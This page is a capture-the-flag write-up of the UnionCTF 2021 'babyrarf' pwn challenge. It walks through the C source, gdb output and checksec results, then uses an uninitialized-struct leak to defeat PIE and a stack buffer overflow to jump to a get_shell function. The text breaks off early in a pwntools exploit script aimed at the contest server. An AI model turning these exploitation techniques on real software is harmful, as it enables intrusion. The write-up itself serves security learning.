<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>[UnionCTF 2021 - pwn] babyrarf | repr</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="The binary can be found right here. [UnionCTF] BabyrarfWelcome guys,  This Write-Up is about de first pwn challenge of unionctf: babyrarf.It was a really easy challenge with a stack based buffer overf">
<meta property="og:type" content="article">
<meta property="og:title" content="[UnionCTF 2021 - pwn] babyrarf">
<meta property="og:url" content="https://n4sm.github.io/posts/babyrarf/index.html">
<meta property="og:site_name" content="repr">
<meta property="og:description" content="The binary can be found right here. [UnionCTF] BabyrarfWelcome guys,  This Write-Up is about de first pwn challenge of unionctf: babyrarf.It was a really easy challenge with a stack based buffer overf">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-02-21T00:00:00.000Z">
<meta property="article:modified_time" content="2023-08-01T09:41:52.483Z">
<meta property="article:author" content="nasm">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="nasm">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="unionCTF 2021">
<meta property="article:tag" content="buffer overflow">
<meta property="article:tag" content="2021">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="repr" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/pic/wall.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>repr </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=https://cdn.discordapp.com/attachments/755522926819934349/1135933820852502589/chtholly_nota_seniorious_by_asukaln_dfhx63b-414w-2x.jpg></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">nasm </div>
      <div class="dot"></div>
      <div class="subtitle">pwn / kernel stuff </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com/nasm_re" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/n4sm" title="GitHub"><i class="fa-brands fa-github"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://ret2school.github.io/discord" title="Discord"><i class="fa-brands fa-discord"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Categories</h3>
      <div class="category-box">
            <a class="category-link" href="/categories/pwn/">
                pwn
                <div class="category-count">19</div>
            </a>
        
            <a class="category-link" href="/categories/kernel/">
                kernel
                <div class="category-count">3</div>
            </a>
        </div>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/posts/iwindow/" title="[ImaginaryCTF 2023 - pwn] window-of-opportunity" >
            <div class="recent-link-text">
              [ImaginaryCTF 2023 - pwn] window-of-opportunity
            </div>
          </a>
        
          <a class="recent-link" href="/posts/mailman/" title="[ImaginaryCTF 2023 - pwn] mailman" >
            <div class="recent-link-text">
              [ImaginaryCTF 2023 - pwn] mailman
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-babyrarf" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        [UnionCTF 2021 - pwn] babyrarf
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2021-02-21T00:00:00.000Z" itemprop="datePublished">2021-02-21</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/pwn/">pwn</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            1.2k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/2021/" rel="tag">2021</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/buffer-overflow/" rel="tag">buffer overflow</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nasm/" rel="tag">nasm</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/unionCTF-2021/" rel="tag">unionCTF 2021</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <p>The binary can be found <a target="_blank" rel="noopener" href="https://github.com/ret2school/ctf/blob/master/2021/unionctf/pwn/babyrarf/babyrarf?raw=true">right here</a>.</p>
<h2 id="UnionCTF-Babyrarf"><a href="#UnionCTF-Babyrarf" class="headerlink" title="[UnionCTF] Babyrarf"></a>[UnionCTF] Babyrarf</h2><p>Welcome guys, </p>
<p>This Write-Up is about de first pwn challenge of <a target="_blank" rel="noopener" href="https://ctf.cr0wn.uk/">unionctf</a>: <a href="">babyrarf</a>.<br>It was a really easy challenge with a stack based buffer overflow. The source code was provided so, no need to reverse the binary :).</p>
<p>Let’s take a look at the src!</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">attack</span> &#123;</span></span><br><span class="line">    <span class="type">uint64_t</span> id;</span><br><span class="line">    <span class="type">uint64_t</span> dmg;</span><br><span class="line">&#125; attack;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">character</span> &#123;</span></span><br><span class="line">    <span class="type">char</span> name[<span class="number">10</span>];</span><br><span class="line">    <span class="type">int</span> health;</span><br><span class="line">&#125; character;</span><br><span class="line"></span><br><span class="line"><span class="type">uint8_t</span> score;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">read_int</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="type">char</span> buf[<span class="number">10</span>];</span><br><span class="line">    fgets(buf, <span class="number">10</span>, <span class="built_in">stdin</span>);</span><br><span class="line">    <span class="keyword">return</span> atoi(buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">get_shell</span><span class="params">()</span>&#123;</span><br><span class="line">    execve(<span class="string">&quot;/bin/sh&quot;</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">attack <span class="title function_">choose_attack</span><span class="params">()</span>&#123;</span><br><span class="line">    attack a;</span><br><span class="line">    <span class="type">int</span> id;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Choose an attack:\n&quot;</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;1. Knife\n&quot;</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;2. A bigger knife\n&quot;</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;3. Her Majesty&#x27;s knife\n&quot;</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;4. A cr0wn\n&quot;</span>);</span><br><span class="line">    id = read_int();</span><br><span class="line">    <span class="keyword">if</span> (id == <span class="number">1</span>)&#123;</span><br><span class="line">        a.id = <span class="number">1</span>;</span><br><span class="line">        a.dmg = <span class="number">10</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (id == <span class="number">2</span>)&#123;</span><br><span class="line">        a.id = <span class="number">2</span>;</span><br><span class="line">        a.dmg = <span class="number">20</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (id == <span class="number">3</span>)&#123;</span><br><span class="line">        a.id = <span class="number">3</span>;</span><br><span class="line">        a.dmg = <span class="number">30</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (id == <span class="number">4</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span> (score == <span class="number">0</span>)&#123;</span><br><span class="line">            <span class="built_in">puts</span>(<span class="string">&quot;l0zers don&#x27;t get cr0wns\n&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            a.id = <span class="number">4</span>;</span><br><span class="line">            a.dmg = <span class="number">40</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Please select a valid attack next time\n&quot;</span>);</span><br><span class="line">        a.id = <span class="number">0</span>;</span><br><span class="line">        a.dmg = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> a;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line">    character player = &#123; .health = <span class="number">100</span>&#125;;</span><br><span class="line">    character boss = &#123; .health = <span class="number">100</span>, .name = <span class="string">&quot;boss&quot;</span>&#125;;</span><br><span class="line">    attack a;</span><br><span class="line">    <span class="type">int</span> dmg;</span><br><span class="line"></span><br><span class="line">    setvbuf(<span class="built_in">stdin</span>, <span class="literal">NULL</span>, _IONBF, <span class="number">0</span>);</span><br><span class="line">    setvbuf(<span class="built_in">stdout</span>, <span class="literal">NULL</span>, _IONBF, <span class="number">0</span>);</span><br><span class="line">    srand(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;You are fighting the rarf boss!\n&quot;</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;What is your name?\n&quot;</span>);</span><br><span class="line">    fgets(player.name, <span class="number">10</span>, <span class="built_in">stdin</span>);</span><br><span class="line"></span><br><span class="line">    score = <span class="number">10</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> (score &lt; <span class="number">100</span>)&#123;</span><br><span class="line">        a = choose_attack();</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;You choose attack %llu\n&quot;</span>, a.id);</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;You deal %llu dmg\n&quot;</span>, a.dmg);</span><br><span class="line">        boss.health -= a.dmg;</span><br><span class="line">        dmg = rand() % <span class="number">100</span>;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;The boss deals %llu dmg\n&quot;</span>, dmg);</span><br><span class="line">        player.health -= dmg;</span><br><span class="line">        <span class="keyword">if</span> (player.health &gt; boss.health)&#123;</span><br><span class="line">            <span class="built_in">puts</span>(<span class="string">&quot;You won!\n&quot;</span>);</span><br><span class="line">            score += <span class="number">1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="built_in">puts</span>(<span class="string">&quot;You lost!\n&quot;</span>);</span><br><span class="line">            score -= <span class="number">1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        player.health = <span class="number">100</span>;</span><br><span class="line">        boss.health = <span class="number">100</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Congratulations! You may now declare yourself the winner:\n&quot;</span>);</span><br><span class="line">    fgets(player.name, <span class="number">48</span>, <span class="built_in">stdin</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>It’s basically some kind of game, we have to win a lot of times to display <code>Congratulations! You may now declare yourself the winner</code>. And when we reach this part we can trigger a buffer overflow with a call to fgets (<code>fgets(player.name, 48, stdin);</code>). We notice too the get_shell function (maybe we will have to jump on ?).</p>
<p>Let’s take a look at gdb:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────</span><br><span class="line">0x00007fffffffdf48│+0x0000: 0x00007ffff7dd30b3  →  &lt;__libc_start_main+243&gt; mov edi, eax	 ← $rsp</span><br><span class="line">0x00007fffffffdf50│+0x0008: 0x00007ffff7ffc620  →  0x0005081200000000</span><br><span class="line">0x00007fffffffdf58│+0x0010: 0x00007fffffffe038  →  0x00007fffffffe357  →  &quot;/home/nasm/dist/babyrarf&quot;</span><br><span class="line">0x00007fffffffdf60│+0x0018: 0x0000000100000000</span><br><span class="line">0x00007fffffffdf68│+0x0020: 0x00005555555552e4  →  &lt;main+0&gt; push rbp</span><br><span class="line">0x00007fffffffdf70│+0x0028: 0x00005555555554d0  →  &lt;__libc_csu_init+0&gt; endbr64 </span><br><span class="line">0x00007fffffffdf78│+0x0030: 0xdb21ca7fd193f05a</span><br><span class="line">0x00007fffffffdf80│+0x0038: 0x00005555555550b0  →  &lt;_start+0&gt; endbr64 </span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────</span><br><span class="line">   0x5555555552de &lt;choose_attack+234&gt; mov    rdx, QWORD PTR [rbp-0x18]</span><br><span class="line">   0x5555555552e2 &lt;choose_attack+238&gt; leave  </span><br><span class="line">   0x5555555552e3 &lt;choose_attack+239&gt; ret    </span><br><span class="line"> → 0x5555555552e4 &lt;main+0&gt;         push   rbp</span><br><span class="line">   0x5555555552e5 &lt;main+1&gt;         mov    rbp, rsp</span><br><span class="line">   0x5555555552e8 &lt;main+4&gt;         sub    rsp, 0x40</span><br><span class="line">   0x5555555552ec &lt;main+8&gt;         mov    QWORD PTR [rbp-0x20], 0x0</span><br><span class="line">   0x5555555552f4 &lt;main+16&gt;        mov    QWORD PTR [rbp-0x18], 0x0</span><br><span class="line">   0x5555555552fc &lt;main+24&gt;        mov    DWORD PTR [rbp-0x14], 0x64</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────</span><br><span class="line"><span class="meta prompt_">[#</span><span class="language-bash">0] Id 1, Name: <span class="string">&quot;babyrarf&quot;</span>, stopped 0x5555555552e4 <span class="keyword">in</span> main (), reason: BREAKPOINT</span></span><br><span class="line">──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────</span><br><span class="line"><span class="meta prompt_">[#</span><span class="language-bash">0] 0x5555555552e4 → main()</span></span><br><span class="line">───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────</span><br><span class="line">gef➤  </span><br></pre></td></tr></table></figure>

<p>And at the call to fgets: </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">   0x55555555537d &lt;main+153&gt;       lea    rax, [rbp-0x20]</span><br><span class="line">   0x555555555381 &lt;main+157&gt;       mov    esi, 0xa</span><br><span class="line">   0x555555555386 &lt;main+162&gt;       mov    rdi, rax</span><br><span class="line"> → 0x555555555389 &lt;main+165&gt;       call   0x555555555060 &lt;fgets@plt&gt;</span><br><span class="line">   ↳  0x555555555060 &lt;fgets@plt+0&gt;    jmp    QWORD PTR [rip+0x2fca]        # 0x555555558030 &lt;fgets@got.plt&gt;</span><br><span class="line">      0x555555555066 &lt;fgets@plt+6&gt;    push   0x3</span><br><span class="line">      0x55555555506b &lt;fgets@plt+11&gt;   jmp    0x555555555020</span><br><span class="line">      0x555555555070 &lt;execve@plt+0&gt;   jmp    QWORD PTR [rip+0x2fc2]        # 0x555555558038 &lt;execve@got.plt&gt;</span><br><span class="line">      0x555555555076 &lt;execve@plt+6&gt;   push   0x4</span><br><span class="line">      0x55555555507b &lt;execve@plt+11&gt;  jmp    0x555555555020</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── arguments (guessed) ────</span><br><span class="line">fgets@plt (</span><br><span class="line"><span class="meta prompt_">   $</span><span class="language-bash">rdi = 0x00007fffffffdf20 → 0x0000000000000000,</span></span><br><span class="line"><span class="meta prompt_">   $</span><span class="language-bash">rsi = 0x000000000000000a,</span></span><br><span class="line"><span class="meta prompt_">   $</span><span class="language-bash">rdx = 0x00007ffff7f97980 → 0x00000000fbad208b</span></span><br><span class="line">)</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────</span><br><span class="line"><span class="meta prompt_">[#</span><span class="language-bash">0] Id 1, Name: <span class="string">&quot;babyrarf&quot;</span>, stopped 0x555555555389 <span class="keyword">in</span> main (), reason: SINGLE STEP</span></span><br><span class="line">──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────</span><br><span class="line"><span class="meta prompt_">[#</span><span class="language-bash">0] 0x555555555389 → main()</span></span><br><span class="line">───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────</span><br><span class="line">gef➤  </span><br></pre></td></tr></table></figure>
<p>So main_ret_addr minus player.name is equal to: <code>0x00007fffffffdf48 - 0x00007fffffffdf20 = 40 </code>.<br>So we have basically a padding of 40 bytes before the return address, and according to the last fgets, we can only enter 48 bytes.<br>We can so overwrite only the return address.</p>
<p>Now we can take a look at the permissions:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">gef➤  checksec</span><br><span class="line">[+] checksec for &#x27;/home/nasm/dist/babyrarf&#x27;</span><br><span class="line">Canary                        : ✘ </span><br><span class="line">NX                            : ✓ </span><br><span class="line">PIE                           : ✓ </span><br><span class="line">Fortify                       : ✘ </span><br><span class="line">RelRO                         : Partial</span><br></pre></td></tr></table></figure>
<p>We can see, the binary is PIE based, so in order to jump on get_shell we need to leak some binary’s functions.<br>To do so we can mind the code of <code>choose_attack</code> function:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">attack <span class="title function_">choose_attack</span><span class="params">()</span>&#123;</span><br><span class="line">    attack a;</span><br><span class="line">    <span class="type">int</span> id;</span><br><span class="line">    <span class="comment">/* Some print stuff */</span></span><br><span class="line">    id = read_int(); <span class="comment">// It is readinf the type of weapons we want</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">/* Here it is handling properly dammage and weapon type */</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (id == <span class="number">4</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span> (score == <span class="number">0</span>)&#123;</span><br><span class="line">            <span class="built_in">puts</span>(<span class="string">&quot;l0zers don&#x27;t get cr0wns\n&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            a.id = <span class="number">4</span>;</span><br><span class="line">            a.dmg = <span class="number">40</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Please select a valid attack next time\n&quot;</span>);</span><br><span class="line">        a.id = <span class="number">0</span>;</span><br><span class="line">        a.dmg = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> a;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>The interesting part is that when our score is zero and that we choose the fourth weapon, the id et dmg fields are not initialized.<br>And so it’s returning a non initialized struct that it will print just next in the main function:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">/* ... */</span></span><br><span class="line">a = choose_attack();</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;You choose attack %llu\n&quot;</span>, a.id);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;You deal %llu dmg\n&quot;</span>, a.dmg);</span><br><span class="line"><span class="comment">/*...*/</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>Uninitialized structures are very useful to obtain leaks because their content is depending of the ancient stackframes which have stored local variables and especially useful pointers.<br>And when we try to leak these datas, we can see that a.id displays the address of <code>__lib_csu_init</code>.<br>So we just need to leak the address of <code>__lib_csu_init</code> to compute the base address of the binary and so the address of <code>get_shell</code>.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&quot;babyrarf&quot;)</span></span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">&#x27;35.204.144.114&#x27;</span>, <span class="number">1337</span>)</span><br><span class="line">e = ELF(<span class="string">&#x27;babyrarf&#x27;</span>)</span><br><span class="line"></span><br><span class="line">set_ = <span class="literal">False</span></span><br><span class="line">base = <span 